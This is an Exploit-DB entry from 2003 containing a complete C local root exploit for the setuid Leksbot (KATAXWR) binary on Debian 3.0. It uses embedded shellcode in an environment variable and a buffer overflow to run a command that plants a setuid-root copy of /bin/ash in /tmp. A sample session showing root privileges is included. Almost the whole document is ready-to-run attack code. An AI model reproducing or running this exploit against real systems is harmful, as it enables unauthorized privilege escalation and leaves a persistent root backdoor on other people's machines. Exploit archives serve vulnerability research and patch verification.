Leksbot 1.2 - Multiple Vulnerabilities

EDB-ID:

22567


Author:

gunzip

Type:

local


Platform:

Linux

Date:

2003-05-06


/*
source: https://www.securityfocus.com/bid/7505/info

Multiple vulnerabilities have been reported for Leksbot. The precise nature of these vulnerabilities are currently unknown however, exploitation of this issue may result in an attacker obtaining elevated privileges. This is because in some installations, the Leksbot binary may be installed setuid.
*/

/* by gunzip 
 * KATAXWR/leksbot local root exploit
 * for Debian Linux 3.0
 * https://www.securityfocus.com/bid/7505
 * change command if you don't like it (gives a root shell in /tmp/ash)
 * http://members.xoom.it/gunzip . more to come
*/
#define COMMAND "cp /bin/ash /tmp && chmod 4755 /tmp/ash"
#define PATH	"/usr/bin/KATAXWR"
#define ADDR	512
#define SIZE	4096
#define OFFSET	2700

char shellcode[] = /* taken from lsd-pl */
    "\xeb\x22"             /* jmp     <cmdshellcode+36>      */
    "\x59"                 /* popl    %ecx                   */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x66\x68""-c"         /* pushw   $0x632d                */
    "\x89\xe7"             /* movl    %esp,%edi              */
    "\x50"                 /* pushl   %eax                   */
    "\x51"                 /* pushl   %ecx                   */
    "\x57"                 /* pushl   %edi                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x89\xe1"             /* movl    %esp,%ecx              */
    "\x99"                 /* cdql                           */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xcd\x80"             /* int     $0x80                  */
    "\xe8\xd9\xff\xff\xff" /* call    <cmdshellcode+2>       */
    COMMAND;

static char cmd[SIZE];

main(int argc, char *argv[])
{
	char buf[ADDR];
	char egg[SIZE];
	int i, offset ;
	unsigned long ret ;
	unsigned long sp = (unsigned long) &sp ;
	printf("Local (possibly) root exploit for /usr/bin/KATAXWR (leksbot)\n"
	       "tested on Debian 3.0 - usage: ./ex [offset] - by gunzip\n");	
	if ( argv[1] ) offset = atoi( argv[1] ); else offset = OFFSET ; 
	ret = sp + offset ;
	memset( cmd, 0x00, SIZE );
	memset( buf, 0x00, ADDR );
	memset( egg, 0x41, SIZE );
	memcpy( &egg[ SIZE - strlen( shellcode ) - 1 ], shellcode, strlen( shellcode ));
	memcpy( egg, "EGG=", 4 );
	egg[ SIZE - 1 ] = 0 ;
	putenv( egg );
 	for ( i=0; i < ADDR ; i += 4 ) *( unsigned long *)&buf[ i ] = ret;
	*( unsigned long *)&buf[ ADDR - 4 ] =  0x00000000 ; /*  :-?  */
	if (!(ret&0xff)||!(ret&0xff00)||!(ret&0xff0000)||!(ret&0xff000000)) {
		printf("Return address contains null byte(s), change offset and retry.\n");
		exit( -1 );
	}
	printf( "retaddr=0x%.08x offset=%d len=%d\n", (unsigned int)ret, offset, strlen( buf ));
	snprintf ( cmd, SIZE - 4, " echo '%s' | %s", buf, PATH );
	system( cmd );
}
/*
 bash-2.05b$ ./a.out
 retaddr=0xbffff668 offset=2700 len=508
 Please insert the term
 #dwsete tin simasia__#
 Do you want to add an other term?(y-n)
 bash-2.05b$ /tmp/ash
 # id
 uid=1002(test) gid=1002(test) euid=0(root) groups=1002(test)
*/